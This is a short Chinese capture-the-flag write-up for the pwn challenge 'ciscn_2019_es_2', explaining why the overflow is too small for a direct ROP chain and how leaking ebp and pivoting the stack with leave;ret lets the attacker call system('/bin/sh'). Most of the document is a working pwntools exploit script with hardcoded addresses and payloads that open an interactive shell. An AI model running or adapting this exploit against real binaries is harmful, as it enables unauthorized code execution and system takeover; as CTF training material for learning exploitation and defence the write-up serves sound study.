代码不复杂,就是两个read和两个print
关键在于这个read的大小和v1的位置。
0x28的和0x30的大小,让我们直接rop的话只能溢出到ret的位置,而不能控制ret函数的参数。
这里就需要用到栈迁移,就把栈的位置往上提,让我们可以控制到ret和ret的参数。
既然我们想让栈往上提,那么就必须知道栈的具体位置,而我们知道,对于一个函数的栈帧中,有地址的位置就是ebp的位置,所以我们可以泄露出ebp的位置进而得到栈的位置。
from pwn import *
a=process("ciscn_2019_es_2")
sys=0x8048400
leave_ret=0x08048562
a.recvuntil("Welcome, my friend. What's your name?")
payload='a'*0x20+'b'*8
a.send(payload)
a.recvuntil("bbbbbbbb")
ebp=u32(a.recv(4))
print (hex(ebp))
payload2='a'*4+p32(sys)+p32(0xdeadbeef)+p32(ebp-0x28)+"/bin/sh"
payload2=payload2.ljust(0x28,'\x00')
payload2+=p32(ebp-0x38)+p32(leave_ret)
print (payload2)
#gdb.attach(a)
a.send(payload2)
a.interactive()
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
